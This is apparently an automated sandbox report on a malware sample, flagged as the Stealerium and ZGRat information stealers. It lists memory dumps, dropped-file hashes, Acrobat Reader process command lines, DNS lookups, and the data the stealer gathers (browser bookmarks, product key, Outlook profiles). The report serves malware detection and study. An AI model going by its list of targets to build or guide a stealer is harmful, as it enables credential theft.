memory/1000-46-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-48-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-52-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-50-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-54-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-56-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-58-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-62-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-66-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-68-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-70-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-72-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-64-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-74-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-76-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-78-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-80-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-82-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-84-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-86-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-90-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-92-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-94-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-96-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-88-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-60-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-100-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-102-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-98-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-104-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-106-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/1000-108-0x0000000006A80000-0x0000000006C84000-memory.dmp
memory/952-655-0x0000000071B40000-0x00000000722F0000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | c26ed30e7d5ab440480838636efc41db |
| SHA1 | c66e0d00b56abebfb60d2fcc5cf85ad31a0d6591 |
| SHA256 | 6a3c5c4a8e57f77ecc22078fbf603ecc31fb82d429bd87b7b4b9261447092aef |
| SHA512 | 96cdb78bca3e01d4513c31661987e5646e6a8ff24708918aa0d66dfa3ca5d98af4862c9f38c4f41f933c345d2d3adfb1d34d1430b33f45f916f41a9872a030df |
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | 752a1f26b18748311b691c7d8fc20633 |
| SHA1 | c1f8e83eebc1cc1e9b88c773338eb09ff82ab862 |
| SHA256 | 111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131 |
| SHA512 | a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5 |
C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
| MD5 | b65b0fffc080d61f81df44a349dcbd5e |
| SHA1 | 8540e8fc99e86275493bffb8e0224a29b6f4d6e5 |
| SHA256 | 6cd8bc3eedeaf4ef2d54af586634e03d8bf7f9a3fdf4256f86a3dd4d006440f7 |
| SHA512 | 29f48f648ba705f29522d0dab95afe44cccb878610a6ecb45bb7131834a31de97bf8f3683ef8a946389507faa90296c1bd33063dba43fc5e95640c1b8f529bdc |
memory/1000-1093-0x00000000028E0000-0x00000000028E1000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | daf72125c1f6c2c88d6a41564d3f025e |
| SHA1 | dbe3ad9f09bdda33f0f318b0d766375baf1fc1f9 |
| SHA256 | 91241978919b4738d0be1891144d0614903a08b1e1975e425407e4694ca342b2 |
| SHA512 | 1133b6013f5a4132d21b208b4a8622e1fd0ae409acdf535d24f00e985bc7387b27407f7cd8bd991e33255cc4752794f6015c0580bdd3885e1b1d6af7665a9776 |
memory/1000-1106-0x0000000005950000-0x0000000005AF2000-memory.dmp
memory/1000-1107-0x0000000005AF0000-0x0000000005B3C000-memory.dmp
memory/4664-1113-0x0000000000400000-0x0000000000592000-memory.dmp
memory/4664-1114-0x0000000071B40000-0x00000000722F0000-memory.dmp
memory/1000-1115-0x0000000071B40000-0x00000000722F0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Buildcrypt.exe.log
| MD5 | c3941d9fa38f1717d5cecd7a2ca71667 |
| SHA1 | 33b5362675383b58b4166ed9f9a61e5aa6768d2e |
| SHA256 | f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256 |
| SHA512 | 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45 |
C:\Users\Admin\AppData\Roaming\Buildcrypt.exe
| MD5 | ebaf811ecff8139439cbcad21e0788d5 |
| SHA1 | f494b3df2a71e137f86b7e9b6f06f6a659534311 |
| SHA256 | 3b1dce1a2e8e3753e7a29b43946c83be26ac9d28de854bae2a81e37af5c58349 |
| SHA512 | 62580c267c09b181f9772d8d132738240022d9abb3c1a89d564c4f0e0d0a2f59161a7527e0d6799cfc1fd5176670d7231d3a7eceb31a4bb3db59f4854efc2219 |
memory/4664-1121-0x0000000005190000-0x00000000051A0000-memory.dmp
memory/4664-1127-0x0000000005180000-0x0000000005188000-memory.dmp
memory/4664-1126-0x00000000059E0000-0x0000000005A06000-memory.dmp
memory/4664-1125-0x0000000005950000-0x00000000059E2000-memory.dmp
memory/4664-1129-0x0000000006830000-0x0000000006838000-memory.dmp
memory/4664-1130-0x0000000006850000-0x000000000686E000-memory.dmp
memory/4664-1128-0x0000000006820000-0x000000000682A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Stealerium-Latest.log
| MD5 | 27fda8b4ccd36e3f67a3567b72d190ff |
| SHA1 | 23a3af45be473349ef5425af4523899c50ce76d8 |
| SHA256 | a696b5a790f107591693870ea2dcc3ace5f8ab11fa192435e99f1c70a7c4b90a |
| SHA512 | 4be81d52a28bf5e7be69dd1db51803288b5817e4e9c56efd1bb78767695f3753e1afa10d3bb29d0d4d684f27c707aa1d53f386d5c04c8b080ffd4d718a7b267e |
memory/4664-1187-0x0000000007020000-0x00000000070B2000-memory.dmp
C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\Admin@EUCQOBEO_en-US\Browsers\Firefox\Bookmarks.txt
| MD5 | 2e9d094dda5cdc3ce6519f75943a4ff4 |
| SHA1 | 5d989b4ac8b699781681fe75ed9ef98191a5096c |
| SHA256 | c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142 |
| SHA512 | d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7 |
C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\Admin@EUCQOBEO_en-US\System\Process.txt
| MD5 | 78f78af907cebe8c34bc2b58820ccb8c |
| SHA1 | 0a1e64adcc9ccd1b59ab0fec3460fd888ddc8d28 |
| SHA256 | 3aaa47224ec7e88b7c1c6b9ad9f69ef163b4a3bb432e2d9cad7a490b81f2d22f |
| SHA512 | 20cad89ca15bd38ca5d621850e914c784dec50c8fd4bc45ac739da6425d84146935d4f3d9d1649e58bc22dc7a91f98559b8492a2183873bc271dd83e90ae238d |
memory/4664-1297-0x0000000005190000-0x00000000051A0000-memory.dmp
memory/4664-1296-0x0000000005190000-0x00000000051A0000-memory.dmp
memory/4664-1331-0x0000000006930000-0x00000000069AA000-memory.dmp
C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\Admin@EUCQOBEO_en-US\System\Apps.txt
| MD5 | b1d58554f33c991f9454f81bf1f6a7a6 |
| SHA1 | 1a9c0748fbb4c4974315f6a3188ffb5078372de1 |
| SHA256 | 2809730601ec3cd803e75dded9788afc2683f6562378a497e7300fd83137838c |
| SHA512 | ef961a73b2b8844155d1684a6d5e0319ad5d0c8cb2c60e4ed16b03cca69e04bf9872f2bff8fdf24d3bf284366f2b2f0d36f1e4c1cd5d007732c3ad0af562d5c6 |
C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\Admin@EUCQOBEO_en-US\Directories\Videos.txt
| MD5 | 1fddbf1169b6c75898b86e7e24bc7c1f |
| SHA1 | d2091060cb5191ff70eb99c0088c182e80c20f8c |
| SHA256 | a67aa329b7d878de61671e18cd2f4b011d11cbac67ea779818c6dafad2d70733 |
| SHA512 | 20bfeafde7fec1753fef59de467bd4a3dd7fe627e8c44e95fe62b065a5768c4508e886ec5d898e911a28cf6365f455c9ab1ebe2386d17a76f53037f99061fd4d |
memory/4664-1404-0x0000000006BB0000-0x0000000006C62000-memory.dmp
C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\Admin@EUCQOBEO_en-US\System\Windows.txt
| MD5 | d3181270194f2c60fb84019a64a67ec0 |
| SHA1 | e60cbb8316305efa9717d6c99702560621cd9901 |
| SHA256 | 08a20a4a7d010e9670afd792ae04a642a7c4b66101bba3111d3f159a220a643d |
| SHA512 | d08944250f7b4e7aaf54f43851596a57da056fa5da3f6c73103d186e7f944ff72cb3a308b76fb38b59376eeebe1838cc7634b3f6f1cdda64fe696dcc07b1f305 |
C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\Admin@EUCQOBEO_en-US\System\ProductKey.txt
| MD5 | 71eb5479298c7afc6d126fa04d2a9bde |
| SHA1 | a9b3d5505cf9f84bb6c2be2acece53cb40075113 |
| SHA256 | f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3 |
| SHA512 | 7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd |
C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\Admin@EUCQOBEO_en-US\Directories\Startup.txt
| MD5 | 68c93da4981d591704cea7b71cebfb97 |
| SHA1 | fd0f8d97463cd33892cc828b4ad04e03fc014fa6 |
| SHA256 | 889ed51f9c16a4b989bda57957d3e132b1a9c117ee84e208207f2fa208a59483 |
| SHA512 | 63455c726b55f2d4de87147a75ff04f2daa35278183969ccf185d23707840dd84363bec20d4e8c56252196ce555001ca0e61b3f4887d27577081fdef9e946402 |
C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\Admin@EUCQOBEO_en-US\Directories\OneDrive.txt
| MD5 | 966247eb3ee749e21597d73c4176bd52 |
| SHA1 | 1e9e63c2872cef8f015d4b888eb9f81b00a35c79 |
| SHA256 | 8ddfc481b1b6ae30815ecce8a73755862f24b3bb7fdebdbf099e037d53eb082e |
| SHA512 | bd30aec68c070e86e3dec787ed26dd3d6b7d33d83e43cb2d50f9e2cff779fee4c96afbbe170443bd62874073a844beb29a69b10c72c54d7d444a8d86cfd7b5aa |
memory/4664-1406-0x0000000008120000-0x0000000008474000-memory.dmp
memory/4664-1408-0x0000000071B40000-0x00000000722F0000-memory.dmp
C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\msgid.dat
| MD5 | 83d0759b0e0bd95d8ec3af4b24d34892 |
| SHA1 | 3ef09021405d57c5c6b6581432064ed6dd055120 |
| SHA256 | dc12668b00a4dd01fa9bdc70018d359e4733d3db9cb387bddeb95e44a3f6585c |
| SHA512 | cf525f2798199adf0a67f68bfa36a206978bc26557616d7dc20d5e0c99a3cf422ca1e9db1724b1dcf31a1f1716e9dd273e3427bad04bf6db395f6575fdf6c783 |
memory/4664-1419-0x00000000072E0000-0x00000000072EA000-memory.dmp
memory/4664-1426-0x0000000005190000-0x00000000051A0000-memory.dmp
memory/4664-1433-0x0000000005190000-0x00000000051A0000-memory.dmp
memory/4664-1434-0x0000000005190000-0x00000000051A0000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
142s
Max time network
150s
Command Line
Signatures
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Document.pdf"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=62049B54191AA028E86743705555F846 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=4D586AF83A5279C81D184BD7E1A33E34 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=4D586AF83A5279C81D184BD7E1A33E34 --renderer-client-id=2 --mojo-platform-channel-handle=1756 --allow-no-sandbox-job /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=03736972FF31BF8D4652A6A526315093 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=03736972FF31BF8D4652A6A526315093 --renderer-client-id=4 --mojo-platform-channel-handle=2296 --allow-no-sandbox-job /prefetch:1
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=293C24FCA16FF55C946C9D1A4B780C29 --mojo-platform-channel-handle=2424 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=01D52CBAE8FBB77AF724ABDA1DC63950 --mojo-platform-channel-handle=2676 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=64CD67F886FBE9EAA9AFF20EC0881F8D --mojo-platform-channel-handle=2780 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.0.37.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.179.17.96.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | b30d3becc8731792523d599d949e63f5 |
| SHA1 | 19350257e42d7aee17fb3bf139a9d3adb330fad4 |
| SHA256 | b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3 |
| SHA512 | 523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e |
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | 752a1f26b18748311b691c7d8fc20633 |
| SHA1 | c1f8e83eebc1cc1e9b88c773338eb09ff82ab862 |
| SHA256 | 111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131 |
| SHA512 | a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5 |
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | c223511c13af47b706b807b82beeaaf6 |
| SHA1 | c8fc8f5becbd11754cd65dbc08418e2a7dd37fd5 |
| SHA256 | 2f12ec42fb50a1e42825c92df791725ff5733e5e3748f1d0275f6cf5f1548796 |
| SHA512 | 603d2ce27610fe36a065525e58532a549f24fd4f2c9fe12804d6dbbfbb773f4b13526a4841619274072eba990f9201fb82c5703fa8e640fd4345efca69e96bd3 |
Analysis: behavioral8
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
14s
Max time network
153s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Stealerium
ZGRat
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File2crypt.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
